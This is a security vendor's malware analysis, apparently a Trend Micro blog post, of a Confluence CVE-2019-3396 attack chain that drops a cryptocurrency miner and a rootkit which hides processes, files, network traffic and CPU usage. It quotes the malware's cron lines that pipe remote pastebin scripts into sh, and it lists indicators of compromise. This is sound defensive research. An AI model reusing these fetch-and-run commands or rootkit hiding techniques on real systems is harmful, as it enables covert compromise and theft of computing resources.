CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner With Rootkit

by Augusto Remillano II and Robert Malagad

In March 2019, Atlassian published an advisory covering two critical vulnerabilities involving Confluence, a widely used collaboration and planning software. In April, we observed one of these vulnerabilities, the widget connector vulnerability CVE-2019-3396, being exploited by threat actors to perform malicious attacks. Security provider Alert Logic also discovered the vulnerability being exploited to drop the Gandcrab ransomware.

It seems that these incidents are not the last we’ve seen of the CVE-2019-3396 exploitation, as threat actors are still finding new ways to exploit the vulnerability. We discovered that it is also being used to deliver a cryptocurrency-mining malware containing a rootkit that was designed to hide its activities. This technique is highly reminiscent of another attack that occurred in November 2018 that used a similar miner-rootkit combination.

Arrival and propagation

Figure 1. Infection chain

The attack begins with a remote command sent to download a shell script from pastebin (hxxps://pastebin[.]com/MjGrx7EA).

This shell script kills certain processes and then downloads and executes “lsd_1” from another pastebin (hxxps://pastebin[.]com/CvJM3qz5). This file is a second shell script that will drop a third shell script, “lsd_2,” sourced from yet another pastebin (hxxps://pastebin[.]com/a3EAddwq).

This shell script is responsible for downloading a trojan dropper from the following servers:

  • gwjyhs[.]com
  • img[.]sobot[.]com

The malware, kerberods (detected as Trojan.Linux.KERBERDS.A), is a custom-packed binary that installs itself via cron jobs:

  • */10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
  • */15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
  • */10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
  • */15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
  • */15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh

Kerberods is responsible for dropping the cryptocurrency miner (khugepageds, detected as Coinminer.Linux.MALXMR.UWEJI) and its rootkit component.  

One particularly interesting aspect of the binary is the way it drops the rootkit. First, it writes the code for the rootkit to a file named /usr/local/lib/{random filename}.c.

Figure 2. Writing the rootkit code

The rootkit is then compiled via gcc, with the output binary being /usr/local/lib/{random filename}.so.

Figure 3. Compiling the rootkit code

Kerberods also has multiple ways of propagating itself, spreading via SSH and exploiting CVE-2019-1003001 and CVE-2019-1003000.

As for khugepageds, it is an XMRig 2.14.1-mo1 Monero miner with a config that is hardcoded into the binary:

Figure 4. The miner’s config

The mining pool can be accessed at systemten[.]org:51640.

Rootkit as evasion method

As mentioned earlier, this attack shares many of the same characteristics of last year’s incident, such as the use of pastebin as a C&C server, the miner payload, and its use of a rootkit to hide the malware.

Like kerberods, the miner payload also uses a custom packer to impede analysis.

Figure 5. The custom packer used for the cryptocurrency-mining malware

Unlike the older rootkit that only hooks the readdir function to hide the mining process, this new version hooks more functions. It hides not only the mining process but also certain files and network traffic. It is also capable of forging the machine’s CPU usage.

The hooked functions are shown below:

  • fopen
  • fopen64
  • lstat
  • lxstat
  • open
  • rmdir
  • stat
  • stat64
  • __xstat
  • __xstat64
  • unlink
  • unlinkat
  • opendir
  • readdir
  • readdir6

Most of the hooked functions would return a “No such file or directory error” if their parameter contains the file name of the rootkit, the miner, or

Figure 6. Hooked functions returning an error to hide the infection

The following image shows the htop system monitor output with and without the rootkit loaded. Note how the version with the rootkit loaded hides the CPU usage and the mining process.

Figure 7. Comparison of the htop system monitor output showing the version with (right) and without (left) the rootkit present
Figure 8. Netstat output before (left) and after (right) the rootkit is loaded
Figure 9. Functions for forging CPU usage and TCP connections
Figure 10. Forging network traffic
Figure 11. Forging CPU usage

The rootkit also serves as a form of persistence by hooking the access function so that a cron job is created to reinstall the malware whenever it is called.

Figure 12. Code showing the cron job used to download and execute kerberods

Security recommendations and solutions

We’ve seen multiple attacks involving CVE-2019-3396 within a short span of time. This shows that cybercriminals are willing and able to abuse any vulnerability in multiple ways. This emphasizes that continuous monitoring is needed to detect any threats in an organization’s environment.

For effective monitoring, organizations can look into the Trend Micro™ Hybrid Cloud Security solution, which provides powerful, streamlined, and automated security within the DevOps pipeline. It also provides multiple XGen™ threat defense techniques for protecting physical, virtual, and cloud workloads.  In addition, it protects containers via the Deep Security™ and Deep Security Smart Check solutions, which help DevOps and security teams scan and ensure the security of container images during preruntime and runtime.

The Trend Micro Deep Security solution protects user systems from threats that may target the following vulnerability rule:

  • 1009705 – Atlassian Confluence Server Remote Code Execution Vulnerability (CVE-2019-3396)  

Indicators of Compromise (IoCs)

Details Hashes
Detection  Name
(coinminer binary)
a9228b6a3fe0b8375d6b881626fd4b59fbbf54dbd60a94b085ee0455b3d18fe9 Trojan.Linux.KERBERDS.A
(cryptocurrency mining malware)
25064a5ab78cdd36e7049d00b9319222906dd634908c1858e2262bf333631213 Coinminer.Linux.MALXMR.UWEJI
3392589c9ebbf7600035574e338d69625cd5ce83ee655582fe8bbadb663532b3 Rootkit.Linux.KERBERDS.A

The post CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner With Rootkit appeared first on .

This post appeared first on Trend Macro Blog
Author: Trend Micro